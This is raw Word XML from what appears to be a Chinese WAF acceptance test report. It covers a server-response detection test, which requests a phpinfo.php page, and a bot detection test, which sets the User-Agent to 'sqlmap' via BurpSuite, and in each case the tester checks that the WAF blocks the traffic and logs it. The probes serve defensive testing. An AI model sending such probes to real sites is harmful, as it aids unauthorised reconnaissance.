                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="intelligence_module_event_32a5c58dfcf84e42867e9d6d8d4dae8c_basic_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId37"/>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90" name="Picture 385164390"/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="intelligence_module_event_32a5c58dfcf84e42867e9d6d8d4dae8c_detail_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId38"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4114800" cy="2314575"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="10C9A001">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0AB76EC1">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A20A0E7">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73CAB50">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="220BF0ED">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F266E2B">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="405D38B2">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5354CCAB">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D850B2E">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="240ACBF0">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc21077804"/>
      <w:bookmarkStart w:id="76" w:name="_Toc81916107"/>
      <w:bookmarkStart w:id="77" w:name="_Toc597505918"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器响应检测模块</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
      <w:bookmarkEnd w:id="76"/>
      <w:bookmarkEnd w:id="7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2D32A82D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4D3E8323">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="7239C475">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务器响应检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="475FE578">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0B6AA0F1">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="14ACE1D2">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>当攻击者发送一些具有攻击行为的请求时，服务端会返回一些信息给攻击者，WAF会根据服务器端返回的信息来判断攻击是否有效从而判断是否进行拦截。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2CF108DE">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="44F2FE91">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="391CCF93">
            <w:pPr>
              <w:pStyle w:val="148"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>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21541E82">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33232E7B">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在客户端构造请求，比如用浏览器访问如下链接：</w:t>
            </w:r>
            <w:r>
              <w:t>http://www.site.com/</w:t>
            </w:r>
            <w:bookmarkStart w:id="78" w:name="OLE_LINK23"/>
            <w:bookmarkStart w:id="79" w:name="OLE_LINK24"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>php</w:t>
            </w:r>
            <w:r>
              <w:t>info.php</w:t>
            </w:r>
            <w:bookmarkEnd w:id="78"/>
            <w:bookmarkEnd w:id="79"/>
          </w:p>
          <w:p w14:paraId="67BAE293">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>并且会返回phpinfo的信息的时候；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0792FC98">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>查看W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否对攻击进行拦截并记录攻击日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="407882F5">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="35EE0896">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="07CC3777">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>有效识别攻击，拦截攻击流量并记录攻击日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="28A1141C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="6A44C9B7">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6BFB7414">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A425747">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="468D3EC7">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="33AE3282">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3CD47361">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D5B1506">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0E1B1F4E">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="418CA503">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_Toc81916108"/>
      <w:bookmarkStart w:id="81" w:name="_Toc21077805"/>
      <w:bookmarkStart w:id="82" w:name="_Toc648430454"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>机器人检测模块</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
      <w:bookmarkEnd w:id="81"/>
      <w:bookmarkEnd w:id="8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6E8778CB">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4BA34E56">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="530128CF">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>机器人检测模块</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3A392EB9">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5E31FDA7">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="3EDCDDE3">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击者在进行攻击时，会优先进行信息探测，使用脚本或者扫描器对网站进行大规模的扫描探测行为，机器人检测模块会根据bot检测算法来判断是否是正常的浏览器发出的正常的请求，大量的探测行为会导致网站的大量信息被攻击者熟知并进行针对性攻击，会暴露更多的攻击面。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6FD15830">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3EC24034">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="3D25F24B">
            <w:pPr>
              <w:pStyle w:val="148"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>
              </w:numPr>
              <w:spacing w:after="163" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>添加防护站点，绑定至后端真实s</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>erver</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73CCF432">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18C110E9">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在客户端构造请求，比如用浏览器访问如下链接：</w:t>
            </w:r>
            <w:r>
              <w:t>http://www.site.com/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41B27FF4">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用BurpSuite修改User-Agent字段为 sqlmap；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77E38E27">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>查看W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否对攻击进行拦截并记录攻击日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2DD82933">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4D312A8A">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="7239C8C5">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>有效识别攻击，拦截攻击流量并记录攻击日志。</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:drawing>
                <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <wp:extent cx="4114800" cy="2314575"/>
                  <wp:docPr id="385164391" name="Picture 385164391"/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="robot_event_8b96af7eb2fd4c8f8f472e1e565f0b6e_basic_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId39"/>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92" name="Picture 385164392"/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="robot_event_8b96af7eb2fd4c8f8f472e1e565f0b6e_detail_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId40"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4114800" cy="2314575"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
